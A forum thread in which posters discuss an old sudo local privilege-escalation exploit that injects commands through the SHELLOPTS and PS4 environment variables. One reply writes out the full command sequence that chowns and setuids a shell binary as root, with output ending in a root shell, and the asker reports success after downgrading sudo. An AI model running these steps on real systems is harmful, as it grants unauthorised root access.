# please help me understand this exploit for sudo :P

## dinsmore

hi

i need to test this exploit on my machine:

http://www.securiteam.com/exploits/6R00E00EKU.html

but i can't seem to understand what it is doing when setting the environment options SHELLOPTS and PS4.... is the x.sh script supposed to execute the commands set in those env variables??

also, i'm guessing that i'm not supposed to have write permissions on the x.sh script, otherwise it would be stupid to setenv instead of just writing the commands into the script...

i don't know much about csh, only that it's a C-like shell with similar syntax maybe....

any help here?

thnx !

----------

## timeBandit

SHELLOPTS=xtrace turns on script tracing, equivalent to `set -x` in bash. The PS4 prompt string is the prompt echoed when tracing is on. Per the Bash manual:

> PS4
> 
>     The value is the prompt printed before the command line is echoed when the `-x' option is set (see section 4.3 The Set Builtin). The first character of PS4 is replicated multiple times, as necessary, to indicate multiple levels of indirection. The default is `+ '.

The same applies to csh (as evidenced by the viability of this exploit).

The exploit requires access to a user who can execute any shell script with root privileges via sudo. The x.sh script is merely an example. When tracing is on, the user's shell evaluates and echoes the PS4 prompt string before each command in the script. However, since the script is run via sudo the shell evaluates PS4 as root. Thus the attacker can inject arbitrary commands (via PS4) into the execution environment of the script, without actually modifying the script.

Following the example:

```
gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
```

The above compiles a small program that simply launches a shell, then uses the sudo exploit to give root ownership of the executable. The command in PS4 is executed immediately before the shell prints "echo Getting root!!" (because tracing is on).

```
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
```

Use the exploit again to run another command as root, this time setting the setuid bit on the executable. Now egg will run as root.

```
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
```

Run egg and hey-presto: you have a root shell. :Shocked:

:Idea: /me sends myself a note to check sudo versions and add "set +x" to my (mercifully few) setuid-root scripts when I get home. :Embarassed:

----------

## dinsmore

that's what i thought, but doing exactly as the description says, it didn't work for me..... Why does the script call bash if we're running from CSH?? will it execute the commands in the PS4 env from csh??

when i run the x.sh with sudo, it doesn't change egg ownership.....

----------

## dinsmore

the exploit description says vulnerable versions are <1.6.8p10. I have 1.6.8p9.......... maybe i should try an older version since they are pretty close.

Does that sound reasonable?

----------

## timeBandit

*dinsmore wrote:*

> Why does the script call bash if we're running from CSH?? will it execute the commands in the PS4 env from csh??

It doesn't, I cited the Bash manual as a reference for PS4 because I had it handy. PS1-PS4 are POSIX variables AFAIK (meaning they're the same for csh and Bash).

As for why it doesn't work for you, perhaps csh was patched to close this hole? I've no idea. csh makes my head hurt. I had the same version of sudo as you but upgraded over the weekend. I can no longer reproduce the experiment.

----------

## dinsmore

ahm, then why does the x.sh example script start with

```
#!/bin/bash -x
```

??

i found my sudo to be blocking env variables such as PS4. you can see this by typing "sudo -V" as root... I edited the sudoers config file to change this, but sudo keeps the same behaviour.. :S

----------

## dinsmore

:Very Happy: :Very Happy:

i installed an older version of sudo which didn't block those variables, so, it worked :Very Happy: niiice

tnx for the help.....

peace out! lol

##EDIT##

btw, nice ken pic :Wink:

----------

## timeBandit

*dinsmore wrote:*

> ahm, then why does the x.sh example script start with
> 
> #!/bin/bash -x

Because I have a large blind spot that obscured the first line of the script. :Embarassed: :Very Happy:

Apologies, I locked on to the use of csh in the example and didn't think it through. I told you csh makes my head hurt. :Very Happy:

Glad I could help, and thanks for noticing CK!

----------

## dinsmore

i was wondering.... where did you get that ken pic? i've been searching for info about ken to see if i can get it for linux, but i can't seem to find any info or pics.... (i'm assuming that pic is from the ken pc game... i used to play it for dos lol)

.. :Razz:

:Smile:

----------

## timeBandit

*dinsmore wrote:*

> i was wondering.... where did you get that ken pic?

I GIMPed a screen shot from the DOS game. :Smile:

----------